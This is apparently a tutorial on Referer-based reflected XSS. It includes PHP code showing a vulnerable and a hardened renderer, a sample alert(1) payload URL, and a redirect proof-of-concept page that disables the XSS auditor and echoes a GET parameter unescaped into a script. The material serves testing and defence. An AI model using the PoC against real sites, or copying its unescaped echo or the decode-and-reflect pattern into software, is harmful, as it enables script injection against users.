What is referer based XSS?
It is a reflected XSS like any other, except that the reflected input is the Referer header: the application writes the Referer value into the response body without sanitization. This happens when a web application uses the Referer value for some feature, such as tracking or a "where did you come from" link.
Note: By default, browsers percent-encode the Referer URL, so this only applies where the application URL-decodes the Referer value before writing it into the page.
Here is what the vulnerable page looks like:
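As an added example (not code from the original post), the snippet below models the vulnerable pattern described above and its hardened form. The function name `renderReferer()` and the "You came from" feature are hypothetical, and the sample Referer string is constructed; what matters is the `urldecode()` step, which undoes the browser's encoding and creates the reflection, and the `htmlspecialchars()` call at the output point, which closes it.

```php
<?php
declare(strict_types=1);

// Hypothetical "where did you come from" feature that reflects the Referer header.
// $hardened selects between the vulnerable pattern and the fixed one.
function renderReferer(string $rawReferer, bool $hardened): string
{
    // Browsers send the Referer percent-encoded. The application undoing that
    // encoding is exactly what turns this into a reflected XSS.
    $decoded = urldecode($rawReferer);

    if (!$hardened) {
        // Vulnerable form: decoded header written straight into the HTML body.
        return "<p>You came from: {$decoded}</p>";
    }

    // Hardened form: encode for the HTML context at the point of output.
    $safe = htmlspecialchars($decoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>You came from: {$safe}</p>";
}

if (PHP_SAPI === 'cli') {
    // Constructed sample: a percent-encoded Referer as a browser would send it
    // after a redirect from a page the tester controls.
    $sample = 'https://attacker.example/?x=%3Cscript%3Ealert(1)%3C%2Fscript%3E';
    echo "Vulnerable: ", renderReferer($sample, false), PHP_EOL;
    echo "Hardened:   ", renderReferer($sample, true), PHP_EOL;
} else {
    header('Content-Type: text/html; charset=UTF-8');
    // Defence in depth: a CSP without 'unsafe-inline' stops an injected inline
    // script from running even if a reflection slips through elsewhere.
    header("Content-Security-Policy: default-src 'self'");
    echo renderReferer($_SERVER['HTTP_REFERER'] ?? '', true);
}
```

Run it with `php example.php` to see both outputs side by side: the vulnerable branch emits the decoded tag verbatim, the hardened branch emits `&lt;script&gt;...`. When reviewing an application for this class of bug, look for any place where `$_SERVER['HTTP_REFERER']` (or the framework equivalent) reaches the response, and check whether a `urldecode()`/`rawurldecode()` happens before output without a matching context-aware encoding step.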
How to exploit?
To control the Referer header, redirect the victim from a page you control and place the XSS payload in that page's URL; the browser then sends that URL as the Referer of the redirected request. Here is the PoC (a hosted version is also available):

```php
<?php
// Disable the legacy XSS auditor so the reflection is not masked during testing.
header('X-XSS-Protection: 0');
?>
<!DOCTYPE html>
<html>
<head>
  <title>Referer based XSS testing</title>
</head>
<body>
  <!-- Redirect to the page under test; this page's own URL (payload included)
       becomes the Referer of the request to the target. -->
  <script>window.location.replace('<?php echo $_GET['target']; ?>');</script>
</body>
</html>
```
Feel free to host it yourself or use the hosted version, then go back and check whether you missed any XSS in a similar scenario.